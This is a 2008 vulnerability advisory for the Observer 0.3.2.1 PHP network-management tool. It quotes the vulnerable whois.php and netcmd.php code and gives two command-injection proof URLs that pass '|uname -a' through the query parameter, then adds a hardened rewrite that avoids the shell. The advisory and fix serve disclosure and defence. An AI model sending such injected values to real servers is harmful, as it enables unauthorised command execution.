Observer 0.3.2.1 Multiple Remote Command Execution Vulnerabilities

2008.10.01
Credit: dun
Risk: High
Local: No
Remote: Yes
CWE: CWE-20


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

  :::::::-.   ...    ::::::.    :::.
   ;;,   `';, ;;     ;;;`;;;;,  `;;;
   `[[     [[[['     [[[  [[[[[. '[[
    $$,    $$$$      $$$  $$$ "Y$c$$
    888_,o8P'88    .d888  888    Y88
    MMMMP"`   "YmmMMMM""  MMM     YM

[ Discovered by dun \ dun[at]strcpy.pl ]

#########################################################
# [ observer <= 0.3.2.1 ]   Remote Command Execution    #
#########################################################
#
# Script: "Observer is an autodiscovering PHP/MySQL/SNMP/CDP based network management system focused primarily on Cisco and Linux/BSD networks."
#
# Script site: http://www.project-observer.org/
# Download: http://freshmeat.net/projects/observer/
#
# Vuln:
# (1) http://site.com/[observer-0.3.2.1]/whois.php?query=|uname -a
# (2) http://site.com/[observer-0.3.2.1]/netcmd.php?cmd=nmap&query=|uname -a
#
#
# Bug(1): ./observer-0.3.2.1/html/whois.php
#
# ...
#   $output = `/usr/bin/whois $_GET[query] | grep -v \%`;
#   $output = trim($output);
#   echo("<pre>$output</pre>");
# ...
#
#
# Bug(2): ./observer-0.3.2.1/html/netcmd.php
#
# ...
#   switch ($_GET[cmd]) {
#     case 'whois':
#       $output = `/usr/bin/whois $_GET[query] | grep -v \%`;
#       break;
#     case 'ping':
#       $output = `/bin/ping $_GET[query]`;
#       break;
#     case 'tracert':
#       $output = `/usr/sbin/traceroute $_GET[query]`;
#       break;
#     case 'nmap':
#       $output = `/usr/bin/nmap $_GET[query]`;
#       break;
#   }
#   $output = trim($output);
#   echo("<pre>$output</pre>");
# ...
#
#
###############################################
# Greetz: D3m0n_DE * str0ke * and otherz..
###############################################

[ dun / 2008 ]

*******************************************************************************************
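Both bugs come from interpolating `$_GET[query]` into a backtick shell string. The following is an added example of a hardened form of the `netcmd.php` dispatch, not code from Observer or from the advisory author; the function and constant names are hypothetical, and it assumes PHP 7.4+ and the binary paths quoted above.

```php
<?php
// Added example, not Observer code. Function and constant names are hypothetical;
// binary paths are the ones quoted in the advisory.
const NETCMD_BINARIES = [            // "cmd" only selects a key, never a path
    'whois'   => '/usr/bin/whois',
    'ping'    => '/bin/ping',
    'tracert' => '/usr/sbin/traceroute',
    'nmap'    => '/usr/bin/nmap',
];

// Accept only an IP literal or a dotted hostname of alphanumeric/hyphen labels.
// Requiring a leading alphanumeric also blocks "-option" argument injection.
function netcmd_valid_target(string $query): bool
{
    if (filter_var($query, FILTER_VALIDATE_IP) !== false) {
        return true;
    }
    $label = '[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?';
    return strlen($query) <= 253
        && preg_match('/^' . $label . '(?:\.' . $label . ')*$/iD', $query) === 1;
}

function netcmd_run(string $cmd, string $query): ?string
{
    if (!array_key_exists($cmd, NETCMD_BINARIES) || !netcmd_valid_target($query)) {
        return null;
    }
    $argv = [NETCMD_BINARIES[$cmd]];
    if ($cmd === 'ping') {
        array_push($argv, '-c', '4');   // assumption: bound the run with a packet count
    }
    $argv[] = $query;
    // Array form of proc_open() (PHP 7.4+) executes the binary directly, with no shell.
    $spec = [1 => ['pipe', 'w'], 2 => ['file', '/dev/null', 'w']];
    $proc = proc_open($argv, $spec, $pipes);
    if (!is_resource($proc)) {
        return null;
    }
    $out = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    proc_close($proc);
    return trim($out);
}

$cmd    = is_string($_GET['cmd'] ?? null) ? $_GET['cmd'] : '';
$query  = is_string($_GET['query'] ?? null) ? $_GET['query'] : '';
$output = netcmd_run($cmd, $query);
if ($output === null) {
    http_response_code(400);
    exit('invalid request');
}
// Encode on output: tool output (whois records especially) is untrusted text.
echo '<pre>' . htmlspecialchars($output, ENT_QUOTES, 'UTF-8') . '</pre>';
```

The original `grep -v \%` filter on whois output is omitted here; it can be applied to `$output` in PHP instead of through a shell pipe.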

References:

http://xforce.iss.net/xforce/xfdb/45398

